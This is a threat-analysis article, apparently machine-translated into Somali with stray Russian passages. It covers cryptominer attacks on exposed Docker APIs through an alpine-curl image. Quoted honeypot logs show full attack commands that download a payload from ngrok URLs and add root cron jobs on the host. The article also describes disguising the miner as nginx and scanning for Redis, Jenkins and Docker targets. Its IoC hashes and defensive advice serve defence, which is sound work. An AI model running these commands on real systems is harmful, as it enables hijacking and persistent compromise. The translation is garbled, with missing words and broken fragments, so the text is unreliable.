Waxaan falanqeynay xogta la aruuriyay anagoo adeegsanayna weelasha malabka, taasoo aan u abuurnay si aan ula socono khataraha. Oo waxaan ogaanay hawlo muhiim ah oo ka yimid macdan qodayaasha cryptocurrency aan la rabin ama aan la ogalayn oo la geeyay sidii weel qallafsan iyadoo la adeegsanayo sawirka bulshadu daabacday ee Docker Hub. Sawirka waxaa loo isticmaalaa qayb ka mid ah adeega bixiya macdanta cryptocurrency xaasidnimo.
Intaa waxaa dheer, barnaamijyada la shaqeynta shabakadaha ayaa lagu rakibay si ay u galaan weelasha deriska furan iyo codsiyada.
Waxaan uga tagnaa malabyadayada sida, taas oo ah, oo leh goobaha caadiga ah, iyada oo aan wax tallaabooyin ammaan ah la qaadin ama rakibida ku xigta ee software dheeraad ah. Fadlan la soco in Docker uu leeyahay talooyin ku saabsan dejinta bilowga ah si looga fogaado khaladaadka iyo dayacanka fudud. Laakiin malabyada la isticmaalo waa weelal, oo loogu talagalay in lagu ogaado weerarrada lala damacsan yahay goobta weelka lagu keydiyo, ee maaha codsiyada gudaha weelasha.
Hawsha xaasidnimada leh ee la ogaaday sidoo kale waa mid xusid mudan sababtoo ah uma baahna dayacan waxayna sidoo kale ka madax banaan tahay nooca Docker. Helitaanka qaab khaldan oo loo habeeyey, oo sidaas darteed furan, sawirka weelka ayaa ah waxa kaliya ee ay u baahan yihiin weeraryahanadu si ay u qaadaan adeegayaal badan oo furan.
Docker API-ga aan la xirin ayaa u oggolaanaya isticmaalaha inuu sameeyo noocyo badan oo kala duwan , oo ay ku jiraan helitaanka liiska weelasha socda, ka soo qaadashada logyada weel gaar ah, bilaabista, joojinta (ay ku jirto qasab) iyo xitaa abuurista weel cusub sawir gaar ah oo leh goobo cayiman.
Dhanka bidix waa habka gaarsiinta malware. Dhanka midig waxaa ku yaal deegaanka weerarka, kaas oo u oggolaanaya in laga saaro sawirada fog.
Qaybinta dalka 3762 Docker APIs furan. Ku salaysan raadinta Shodan ee ku taariikhaysan 12.02.2019/XNUMX/XNUMX
Silsiladda weerarka iyo ikhtiyaarrada culeyska
Dhaqdhaqaaq xaasidnimo ah ayaa la ogaaday ma aha oo kaliya iyada oo la kaashanayo sanduuqyada malabka. Xogta Shodan waxay muujineysaa in tirada Docker APIs ee daaha ka qaaday (eeg garaafyada labaad) ay kordheen tan iyo markii aan baarnay weel khaldan oo loo isticmaalo buundada si loo geeyo software macdanta cryptocurrency Monero. Bishii Oktoobar ee sannadkii hore (2018, xogta hadda jirta qiyaastii turjumaan) waxaa jiray kaliya 856 APIs oo furan.
Baadhitaan lagu sameeyay geedaha malabka ayaa muujiyay in isticmaalka sawirka weelka uu sidoo kale la xiriiro isticmaalka , Qalab lagu dhiso isku-xiryo sugan ama u soo gudbinta taraafikada meelaha dadweynaha laga heli karo ilaa ciwaanno cayiman ama agab (tusaale localhost). Tani waxay u oggolaaneysaa weeraryahannada inay si firfircoon u abuuraan URL-yada marka ay gaarsiinayaan culeyska server-ka furan. Hoos waxaa ah tusaalooyin kood ah oo ka mid ah diiwaannada muujinaya xadgudubka adeegga ngrok:
Tty: false
Command: “-c curl –retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d ”hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d” >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”
Tty: false,
Command: “-c curl –retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c ”cron || crond””,
Entrypoint: “/bin/sh”,
Tty: false,
Cmd: “-c curl –retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed ”hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee”;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/crontab;echo ”* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed” >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c ”cron || crond””,
Entrypoint: “/bin/sh”Sida aad arki karto, faylasha la soo galiyay waxaa laga soo dejiyey URL-yada joogtada ah ee beddelaya. URL-yadani waxay leeyihiin taariikh dhicis gaaban, sidaa darteed culayska lacag-bixinta lama soo dejin karo taariikhda uu dhacayo ka dib.
Есть два варианта полезной нагрузки. Первый — скомпилированный майнер в формате ELF для Linux (определяемый как Coinminer.SH.MALXMR.ATNO), который подключается к пулу для майнинга. Второй — скрипт (TrojanSpy.SH.ZNETMAP.A), предназначенный для получения определенных сетевых инструментов, используемых для сканирования сетевых диапазонов и последующего поиска новых целей.
Qoraalka hoos u dhaca ayaa dejinaya laba doorsoome, kuwaas oo markaa loo isticmaalo in lagu geeyo macdanta cryptocurrency. Doorsoomiyaha HOST waxa uu ka kooban yahay URL halka ay ku yaalaan faylalka xaasidnimada ah, doorsoomiyaha RIP waa magaca faylka (runtii, xashiishka) macdanta la geynayo. Doorsoomaha HOST waa is beddelaa mar kasta oo doorsoomaha xashiishku is beddelo. Qoraalku wuxuu sidoo kale isku dayaa inuu hubiyo in aysan jirin macdan qodayaal kale oo cryptocurrency ah oo ku shaqeeya server-ka la weeraray.
Tusaalooyinka HOST iyo RIP doorsoomayaasha, iyo sidoo kale qayb yar oo code ah oo loo isticmaalo in lagu hubiyo in aanay macdan qodayaal kale socon.
Прежде чем запускать майнер, он переименовывается в nginx. Другие версии этого скрипта переименовывают майнер в другие легитимные сервисы, которые могут присутствовать в окружениях Linux. Этого обычно достаточно для обхода проверок по списку запущенных процессов.
Qoraalka raadinta wuxuu kaloo leeyahay astaamo. Waxay la shaqeysaa isla adeegga URL si loo geeyo agabyada lagama maarmaanka ah. Waxaa ka mid ah zmap binary, kaas oo loo isticmaalo in lagu sawiro shabakadaha iyo helitaanka liiska dekedaha furan. Qoraalku waxa kale oo uu ku raran yahay binary kale oo loo isticmaalo in lagula falgalo adeegyada la helay oo laga helo boodhadh si loo go'aamiyo macluumaadka dheeraadka ah ee ku saabsan adeegga la helay (tusaale, noociisa).
Qoraalku sidoo kale wuxuu horay u sii go'aamiyaa qaar ka mid ah shabakadaha kala duwan si loo sawiro, laakiin tani waxay kuxirantahay nooca qoraalka. Waxa kale oo ay dejisaa dekedaha bartilmaameedka ah ee adeegyada - kiiskan, Docker - ka hor inta aan la samayn sawirka.
Как только найдены предполагаемые цели — автоматически из них снимаются баннеры. Скрипт также фильтрует цели в зависимости от интересующих его сервисов, приложений, компонентов или платформ: Redis, Jenkins, Drupal, MODX, , Docker 1.16 macmiilka iyo Apache CouchDB. Haddii server-ka la sawiray uu u dhigma mid ka mid ah, waxa lagu kaydiyaa faylka qoraalka, kaas oo weeraryahanadu ay hadhow u isticmaali karaan falanqaynta xiga iyo jabsiga. Faylashan qoraalka ah waxaa lagu shubaa xayndaabyada weeraryahannada iyadoo loo marayo xiriirro firfircoon. Taasi waa, URL gaar ah ayaa loo isticmaalaa fayl kasta, taas oo macnaheedu yahay in gelitaanka dambe ay adag tahay.
Weerarku waa sawir Docker ah, sida lagu arki karo labada qaybood ee soo socda ee koodka.
Xagga sare waxa loo beddelayaa adeeg sharci ah, xagga hoosena waa sida zmap loo isticmaalo si loo sawiro shabakadaha
Xagga sare waxa ku yaal safaf hore loo sii qeexay, xagga hoose waxa ku yaal dekedo gaar ah oo adeegyada laga raadiyo, oo ay ku jiraan Docker
Sawirku wuxuu muujinayaa in sawirka alpine-curl la soo dejiyay in ka badan 10 milyan jeer
На основе Alpine Linux и curl, ресурсоэффективного инструмента CLI для передачи файлов по различным протоколам, можно собрать . Sida aad ku arki karto sawirkii hore, sawirkan waxaa horay loo soo dejiyay in ka badan 10 milyan oo jeer. Tiro badan oo la soo dejiyo ayaa laga yaabaa inay la macno tahay isticmaalka sawirkan meel laga soo galo; sawirkan waxa la cusboonaysiiyay in ka badan lix bilood ka hor; isticmaalayaashu kama soo dejin sawirro kale kaydkan marar badan. Gudaha Docker - Tilmaamo loo isticmaalo in lagu habeeyo weelka si loo socodsiiyo. Haddii goobaha laga soo galo ay khaldan yihiin (tusaale ahaan, weelka wuxuu ka furan yahay internetka), sawirka waxaa loo isticmaali karaa sidii weerar. Weeraryahanadu waxay u isticmaali karaan inay ku gudbiyaan culayska lacagta haddii ay helaan weel si khaldan loo habeeyey ama furan oo aan la taageerin.
Waxaa muhiim ah in la ogaado in sawirkan (alpine-curl) laftiisa uusan ahayn mid xaasidnimo ah, laakiin sida aad kor ku arki karto, waxaa loo isticmaali karaa in lagu sameeyo hawlo xaasidnimo ah. Sawirada Docker ee la midka ah ayaa sidoo kale loo isticmaali karaa in lagu sameeyo hawlo xaasidnimo ah. Waxaan la xiriirnay Docker oo aan kala shaqeynay arrintan.
talooyinka
hadhaagii shirkado badan, gaar ahaan kuwa fulinaya , diiradda saaraya horumarka degdega ah iyo gaarsiinta. Wax kasta waxaa sii xumeynaya baahida loo qabo in loo hoggaansamo shuruucda xisaabinta iyo la socodka, baahida loo qabo in lala socdo sirta xogta, iyo sidoo kale waxyeellada weyn ee ka timaadda u hoggaansanaan la'aantooda. Ku darista otomaatiga amniga ee wareegga nolosha horumarka kaliya kuma caawineyso inaad hesho godad amni oo laga yaabo inay si kale u dhacdo aan la ogaan, laakiin sidoo kale waxay kaa caawineysaa inaad yareyso culeyska shaqada ee aan loo baahnayn, sida socodsiinta softiweerka dheeriga ah waxay u dhistaa nuglaanta ama qaabeynta khaldan ee kasta oo la ogaado ka dib marka codsiga la diro.
Dhacdada lagu falanqeeyay maqaalkan waxay muujinaysaa baahida loo qabo in la tixgeliyo badbaadada bilawga, oo ay ku jiraan talooyinka soo socda:
- Loogu talagalay maamulayaasha nidaamka iyo horumariyeyaal: Had iyo jeer hubi dejimahaaga API si aad u hubiso in wax walba loo habeeyey inay aqbalaan oo keliya codsiyada server gaar ah ama shabakad gudaha ah.
- Raac mabda'a xuquuqaha ugu yar: hubi in sawirada weelka la saxeexo oo la xaqiijiyo, xaddid gelitaanka qaybaha muhiimka ah (adeegga furitaanka konteenarada) oo ku dar sirta isku xidhka shabakada.
- Raac oo awood u siinaya hababka amniga, sida; oo lagu dhex dhisay .
- Isticmaal iskaanka otomaatiga ah ee runtimes iyo sawirada si aad u hesho macluumaad dheeraad ah oo ku saabsan hababka ku dhex socda weelka (tusaale, si aad u ogaatid qashin-qubka ama raadinta nuglaanta). Xakamaynta arjiga iyo la socodka daacadnimada waxay caawiyaan la socodka isbeddelada aan caadiga ahayn ee server-yada, faylasha, iyo aagagga nidaamka.
Trendmicro wuxuu caawiyaa kooxaha DevOps inay si badbaado leh u dhistaan, si degdeg ah u soo baxaan, oo meel kasta u bilaabaan. Trend Micro Waxay siisaa badbaado awood leh, la habeeyey, oo iswada toosan oo dhan dhuumaha ururka ee DevOps waxayna bixisaa difaacyo badan oo khatar ah si loo ilaaliyo culeyska shaqada jirka, farsamada iyo daruuraha wakhtiga runtime. Waxa kale oo ay ku daraysaa ilaalinta weelka и , kaas oo ka baadhaya sawirada weelka Docker ee malware-ka iyo dayacanka meel kasta oo ka mid ah dhuumaha horumarinta si looga hortago khataraha ka hor inta aan la dirin.
Calaamadaha tanaasulka
xashiishka la xidhiidha:
- 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
- f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)
In Ku-hadlayaashu waxay muujinayaan waxa loo baahan yahay in marka hore la sameeyo si loo yareeyo suurtogalnimada ama looga fogaado in ay dhacdo xaaladda kor lagu sharraxay. Iyo Agoosto 19-21 oo si degdeg ah online-ka ah Waxaad kuwan iyo kuwa la midka ah dhibaatooyinka amniga kala hadli kartaa asxaabta iyo macallimiinta ku hawlan miis wareeg ah, halkaas oo qof kastaa uu ka hadli karo oo uu dhageysan karo xanuunka iyo guulaha asxaabta khibradda leh.
Source: www.habr.com
